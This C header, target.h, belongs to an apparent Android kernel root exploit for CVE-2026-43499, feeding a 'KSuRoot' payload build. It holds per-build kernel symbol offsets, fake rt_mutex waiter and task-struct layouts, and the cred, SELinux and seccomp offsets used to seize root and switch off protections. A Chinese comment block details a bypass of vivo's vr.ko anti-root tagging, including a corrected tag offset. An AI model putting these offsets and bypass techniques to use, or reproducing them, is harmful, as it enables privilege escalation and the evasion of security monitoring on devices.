#ifndef TARGET_H
#define TARGET_H

#define BUILD_VARIANT_LABEL "p9_cp2a_260605_012_truephone"
#ifndef BUILD_FINGERPRINT
#define BUILD_FINGERPRINT "google/tokay/tokay:17/CP2A.260605.012/15430684:user/release-keys"
#endif

#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define P0_PAGE_OFFSET 0xffffff8000000000ULL
#define P0_PHYS_OFFSET 0x80000000ULL
#define P0_KERNEL_PHYS_LOAD 0x80000000ULL
#define KERNELSNITCH_IDENTITY_START 0xffffff8000000000ULL
#define KERNELSNITCH_IDENTITY_END 0xffffff9000000000ULL
#define DIRECT_MAP_BASE 0xffffff8000000000ULL
#define DIRECT_MAP_END 0xffffff9000000000ULL
#define VMEMMAP_START 0xfffffffe00000000ULL

#define PSELECT_WAITER_WORD_SHIFT 1

#define ASHMEM_MISC_FOPS_OFF 0x0217cb80ULL
#define ASHMEM_FOPS_OFF 0x01280b50ULL
#define ASHMEM_IOCTL_OFF 0x00c38d28ULL
#define ASHMEM_COMPAT_IOCTL_OFF 0x00c39660ULL
#define ASHMEM_MMAP_OFF 0x00c396b8ULL
#define ASHMEM_OPEN_OFF 0x00c398d8ULL
#define ASHMEM_RELEASE_OFF 0x00c39960ULL
#define ASHMEM_SHOW_FDINFO_OFF 0x00c39a80ULL
#define CONFIGFS_READ_ITER_OFF 0x00464400ULL
#define CONFIGFS_BIN_WRITE_ITER_OFF 0x00464930ULL
#define COPY_SPLICE_READ_OFF 0x003e5fd4ULL
#define NOOP_LLSEEK_OFF 0x003986dcULL
#define INIT_TASK_OFF 0x0201f640ULL
#define INIT_UTS_NS_OFF 0x021a2cb0ULL
#define EMPTY_ZERO_PAGE_OFF 0x02201000ULL
#define ROOT_TASK_GROUP_OFF 0x02208580ULL
#define SELINUX_BLOB_SIZES_OFF 0x015ceb88ULL
#define SELINUX_ENFORCING_OFF 0x0225a420ULL
#define SECURITY_HOOK_HEADS_OFF 0x015ce478ULL
#define KMALLOC_CACHES_OFF 0x015cdfb8ULL
#define ANON_PIPE_BUF_OPS_OFF 0x01109910ULL

#define ASHMEM_MISC_FOPS (KIMAGE_TEXT_BASE + ASHMEM_MISC_FOPS_OFF)
#define ASHMEM_FOPS (KIMAGE_TEXT_BASE + ASHMEM_FOPS_OFF)
#define ASHMEM_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_IOCTL_OFF)
#define ASHMEM_COMPAT_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_COMPAT_IOCTL_OFF)
#define ASHMEM_MMAP (KIMAGE_TEXT_BASE + ASHMEM_MMAP_OFF)
#define ASHMEM_OPEN (KIMAGE_TEXT_BASE + ASHMEM_OPEN_OFF)
#define ASHMEM_RELEASE (KIMAGE_TEXT_BASE + ASHMEM_RELEASE_OFF)
#define ASHMEM_SHOW_FDINFO (KIMAGE_TEXT_BASE + ASHMEM_SHOW_FDINFO_OFF)
#define CONFIGFS_READ_ITER (KIMAGE_TEXT_BASE + CONFIGFS_READ_ITER_OFF)
#define CONFIGFS_BIN_WRITE_ITER (KIMAGE_TEXT_BASE + CONFIGFS_BIN_WRITE_ITER_OFF)
#define COPY_SPLICE_READ (KIMAGE_TEXT_BASE + COPY_SPLICE_READ_OFF)
#define NOOP_LLSEEK (KIMAGE_TEXT_BASE + NOOP_LLSEEK_OFF)
#define INIT_TASK (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define INIT_UTS_NS (KIMAGE_TEXT_BASE + INIT_UTS_NS_OFF)
#define EMPTY_ZERO_PAGE (KIMAGE_TEXT_BASE + EMPTY_ZERO_PAGE_OFF)
#define ROOT_TASK_GROUP (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SELINUX_BLOB_SIZES (KIMAGE_TEXT_BASE + SELINUX_BLOB_SIZES_OFF)
#define SELINUX_ENFORCING (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)
#define SECURITY_HOOK_HEADS (KIMAGE_TEXT_BASE + SECURITY_HOOK_HEADS_OFF)
#define KMALLOC_CACHES (KIMAGE_TEXT_BASE + KMALLOC_CACHES_OFF)
#define ANON_PIPE_BUF_OPS (KIMAGE_TEXT_BASE + ANON_PIPE_BUF_OPS_OFF)

#define SLIDE_NFULNL_LOGGER_OFF 0x020129d0ULL
#define SLIDE_LOGGERS_0_1_OFF 0x02012920ULL
#define SLIDE_RANDOM_BOOT_ID_DATA_OFF 0x02137d08ULL
#define SLIDE_INIT_TASK_OFF INIT_TASK_OFF
#define SLIDE_ROOT_TASK_GROUP_OFF ROOT_TASK_GROUP_OFF
#define SLIDE_SYSCTL_BOOTID_OFF 0x0227b498ULL

#define SLIDE_NFULNL_LOGGER_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OFF)
#define SLIDE_LOGGERS_0_1_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_LOGGERS_0_1_OFF)
#define SLIDE_RANDOM_BOOT_ID_DATA_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_RANDOM_BOOT_ID_DATA_OFF)
#define SLIDE_INIT_TASK_IMAGE (KIMAGE_TEXT_BASE + SLIDE_INIT_TASK_OFF)
#define SLIDE_ROOT_TASK_GROUP_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_ROOT_TASK_GROUP_OFF)
#define SLIDE_SYSCTL_BOOTID_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)

#define LOCK_OFF 0x1350
#define W0_OFF 0x2220
#define FOPS_OFF 0x1000
#define SCRATCH_OFF 0x3000
#define RIGHT_OFF 0x4440
#define LEFT_OFF 0x5550
#define FAKE_TASK_OFF 0x3200

#define WAITER_LOCAL_OFF 0x80
#define WAITER_TREE_ENTRY_OFF 0x00
#define WAITER_PI_TREE_ENTRY_OFF 0x18
#define WAITER_TASK_OFF 0x30
#define WAITER_LOCK_OFF 0x38
#define WAITER_WAKE_STATE_OFF 0x40
#define WAITER_PRIO_OFF 0x44
#define WAITER_DEADLINE_OFF 0x48
#define WAITER_WW_CTX_OFF 0x50

#define FAKE_WAITER_TREE_PRIO_OFF 0x18
#define FAKE_WAITER_TREE_DEADLINE_OFF 0x20
#define FAKE_WAITER_PI_TREE_ENTRY_OFF 0x28
#define FAKE_WAITER_PI_TREE_PRIO_OFF 0x40
#define FAKE_WAITER_PI_TREE_DEADLINE_OFF 0x48
#define FAKE_WAITER_TASK_OFF 0x50
#define FAKE_WAITER_LOCK_OFF 0x58
#define FAKE_WAITER_WAKE_STATE_OFF 0x60
#define FAKE_WAITER_WW_CTX_OFF 0x68

#define FAKE_TASK_USAGE_OFF 0x40
#define FAKE_TASK_PRIO_OFF 0x84
#define FAKE_TASK_NORMAL_PRIO_OFF 0x8c
#define FAKE_TASK_TASK_GROUP_OFF 0x348
#define FAKE_TASK_PI_LOCK_OFF 0x924
#define FAKE_TASK_PI_WAITERS_OFF 0x938
#define FAKE_TASK_PI_TOP_TASK_OFF 0x948
#define FAKE_TASK_PI_BLOCKED_ON_OFF 0x950

#define CFG_PAGE_OFF 16
#define CFG_NEEDS_READ_FILL_OFF 80
#define CFG_BIN_BUFFER_OFF 88
#define CFG_BIN_BUFFER_SIZE_OFF 96
#define CFG_CB_MAX_SIZE_OFF 100

#define MM_OWNER_OFF 1032
#define TASK_PID_OFF 0x630
#define TASK_TGID_OFF 0x634
#define TASK_REAL_PARENT_OFF 0x640
#define TASK_ATOMIC_FLAGS_OFF 0x5d8
#define TASK_REAL_CRED_OFF 0x830
#define TASK_CRED_OFF 0x838
#define TASK_COMM_OFF 0x848
#define TASK_TASKS_OFF 0x550
#define TASK_THREAD_GROUP_OFF 0x6e0
#define TASK_PI_LOCK_OFF 0x924
#define TASK_PI_WAITERS_OFF 0x938
#define TASK_PI_TOP_TASK_OFF 0x948
#define TASK_PI_BLOCKED_ON_OFF 0x950
#define TASK_THREAD_INFO_FLAGS_OFF 0x00
#define TASK_SECCOMP_OFF 0x8e8

#define CRED_UID_OFF 4
#define CRED_SECUREBITS_OFF 36
#define CRED_CAPS_OFF 40
#define CRED_SECURITY_OFF 120
#define SELINUX_CRED_BLOB_OFF 0
#define SELINUX_CRED_OSID_OFF 0
#define SELINUX_CRED_SID_OFF 4
#define SECCOMP_MODE_OFF 0x00
#define SECCOMP_FILTER_COUNT_OFF 0x04
#define SECCOMP_FILTER_OFF 0x08
#define TIF_SECCOMP_BIT 11
#define PFA_NO_NEW_PRIVS_BIT 0

#define STRUCT_PAGE_SIZE 0x40
#define STRUCT_PAGE_COMPOUND_HEAD_OFF 0x08
#define STRUCT_SLAB_CACHE_OFF 0x18
#define STRUCT_PAGE_TYPE_OFF 0x30

#define PIPE_BUFFER_SIZE 0x28
#define PIPE_BUFFER_SLOTS 32
#define PIPE_BUF_FLAG_CAN_MERGE 0x10
#define PIPE_INODE_INFO_STRUCT_SIZE 0xb8
#define PIPE_INODE_INFO_SIZE 0xc0
#define PIPE_INODE_INFO_SLOTS_PER_PAGE 21
#define PIPE_HEAD_OFF 0x60
#define PIPE_TAIL_OFF 0x64
#define PIPE_MAX_USAGE_OFF 0x68
#define PIPE_RING_SIZE_OFF 0x6c
#define PIPE_NR_ACCOUNTED_OFF 0x70
#define PIPE_READERS_OFF 0x74
#define PIPE_WRITERS_OFF 0x78
#define PIPE_FILES_OFF 0x7c
#define PIPE_TMP_PAGE_OFF 0x90
#define PIPE_BUFS_OFF 0xa8
#define PIPE_USER_OFF 0xb0

#define FOPS_OWNER_OFF 0x00
#define FOPS_LLSEEK_OFF 0x08
#define FOPS_READ_OFF 0x10
#define FOPS_WRITE_OFF 0x18
#define FOPS_READ_ITER_OFF 0x20
#define FOPS_WRITE_ITER_OFF 0x28
#define FOPS_IOCTL_OFF 0x50
#define FOPS_COMPAT_IOCTL_OFF 0x58
#define FOPS_MMAP_OFF 0x60
#define FOPS_OPEN_OFF 0x70
#define FOPS_RELEASE_OFF 0x80
#define FOPS_SPLICE_READ_OFF 0xc8
#define FOPS_SHOW_FDINFO_OFF 0xe0

/* ---- vivo vr.ko anti-root per-task tag (Option A: surgical de-tag) ----
 *
 * 本块由本项目（KSuRoot 载荷构建）追加，**不是**原 target.h 的内容。
 * 偏移来源：boxiaolanya2008/CVE-2026-43499-Neo11Plus 的
 *   exploit/src/targets/PD2520-BP2A.250605.031.A3/target.h（同一份 GKI 代码）
 *   -> 来源层级 UPSTREAM_TARGET_H（不是本机实测）。
 *
 * 作用：定义 VR_TAG_A_OFF 后，root.c 里 `#ifdef VR_TAG_A_OFF` 那一段
 * （patch_task_vr_tag：先清 VR_SYSCALL_TP_FLAG，再逐字节清 tag A / tag B，
 *  最后回读自证）才会被编进 .so。不定义 = 这份 .so 不带反 vr.ko 绕过。
 *
 * ⚠️ 只定义 VR_TAG_*，**故意不定义** SYS_EXIT_TP_OFF / RVH_COMMIT_CREDS_TP_OFF：
 *   那两个符号偏移是 neutralize_vr()（全局关掉 vr 的 sys_exit 探针）用的，
 *   本族没有可核实的值 —— 认不出就不编进去，绝不填占位值。
 *   因此这两份基线只带 per-task 抹标记（Option A），不带全局 kill switch。
 *
 * ⚠️ VR_TAG_A_OFF / VR_TAG_B_OFF 上游是硬编码的，没进 offsets.json，
 *   所以打补丁阶段**改不了**它们；这里硬编码并标注来源。
 */
/* [2026-10 修] 真机实测：**6.1 的 tag A 在 task+0x04，不是 0x06**。
 *
 * 依据：X100 Pro（PD2324）6.1.145 厂商 vendor_boot 里的 lib/modules/vr.ko，
 * 反汇编出的打标记函数与 6.12.58 那份**严格同构**，只有这一处偏移不同：
 *
 *   6.1.145 : ldrb w8,[x1,#4]  ... strb w8,[x1,#4]  / strb w8,[x1,#44]  stset 0x400,[x1]
 *   6.12.58 : ldrb w8,[x1,#6]  ... strb w8,[x1,#6]  / strb w8,[x1,#44]  stset 0x400,[x1]
 *
 * 而 root.c 只往 task+VR_TAG_A_OFF 写**一个字节**（`uint8_t zero8`），
 * 所以填 0x06 时真正的那一字节 **根本没被清掉** —— 更隐蔽的是
 * 回读校验读的是同一个偏移，拿到 0 就报"成功"，**不会暴露这个错误**。
 */
#define VR_TAG_A_OFF           0x04
#define VR_TAG_B_OFF           0x2c
#define VR_SYSCALL_TP_FLAG     0x400ULL

#endif
